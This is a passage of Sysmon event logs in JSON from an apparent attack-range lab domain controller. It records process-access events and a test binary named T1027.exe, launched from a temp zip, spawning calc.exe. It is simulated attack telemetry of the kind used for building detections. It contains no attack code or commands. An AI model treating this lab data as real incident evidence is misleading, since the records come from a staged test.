05:52:45.437","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5316,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.437\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.437","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5317,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.437\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.437","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5318,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.453\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032D-5F25-0000-0010A2490A00}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.453","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032D-5F25-0000-0010A2490A00}","TargetProcessId":"3288","TargetImage":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5319,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.639\r\nProcessGuid: {A837DB8D-032D-5F25-0000-0010F94B0A00}\r\nProcessId: 3776\r\nImage: C:\\Windows\\SysWOW64\\calc.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Calculator\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CALC.EXE\r\nCommandLine: calc.exe\r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032A-5F25-0000-002094BE0900}\r\nLogonId: 0x9BE94\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=40E85286357723F326980A3B30F84E4F,SHA256=C74F41325775DE4777000161A057342CC57A04E8B7BE17B06576412EFF574DC5,IMPHASH=200BD8706C36BF07F7EF1B236749FD70\r\nParentProcessGuid: {A837DB8D-032D-5F25-0000-0010A2490A00}\r\nParentProcessId: 3288\r\nParentImage: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe\r\nParentCommandLine: \"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe\"  ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.639","ProcessGuid":"{A837DB8D-032D-5F25-0000-0010F94B0A00}","Image":"C:\\Windows\\SysWOW64\\calc.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Calculator","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"CALC.EXE","CommandLine":"calc.exe","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032A-5F25-0000-002094BE0900}","LogonId":"0x9be94","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=40E85286357723F326980A3B30F84E4F,SHA256=C74F41325775DE4777000161A057342CC57A04E8B7BE17B06576412EFF574DC5,IMPHASH=200BD8706C36BF07F7EF1B236749FD70","ParentProcessGuid":"{A837DB8D-032D-5F25-0000-0010A2490A00}","ParentProcessId":"3288","ParentImage":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe","ParentCommandLine":"\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe\"  ","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5320,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.625\r\nSourceProcessGUID: {A837DB8D-032D-5F25-0000-0010A2490A00}\r\nSourceProcessId: 3288\r\nSourceThreadId: 4928\r\nSourceImage: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe\r\nTargetProcessGUID: {A837DB8D-032D-5F25-0000-0010F94B0A00}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Windows\\SysWOW64\\calc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe+7fd64|C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe+7f579|C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe+f743|C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe+10f06|C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe+3c60|C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe+49c2|C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe+27f90|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.625","SourceProcessGUID":"{A837DB8D-032D-5F25-0000-0010A2490A00}","SourceProcessId":"3288","SourceThreadId":"4928","SourceImage":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe","TargetProcessGUID":"{A837DB8D-032D-5F25-0000-0010F94B0A00}","TargetProcessId":"3776","TargetImage":"C:\\Windows\\SysWOW64\\calc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe+7fd64|C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe+7f579|C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe+f743|C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe+10f06|C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe+3c60|C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe+49c2|C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\temp_T1027.zip\\T1027.exe+27f90|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5321,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.640\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032D-5F25-0000-0010F94B0A00}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Windows\\SysWOW64\\calc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.640","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032D-5F25-0000-0010F94B0A00}","TargetProcessId":"3776","TargetImage":"C:\\Windows\\SysWOW64\\calc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5322,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.640\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.640","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5323,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.640\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.640","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5324,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.640\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 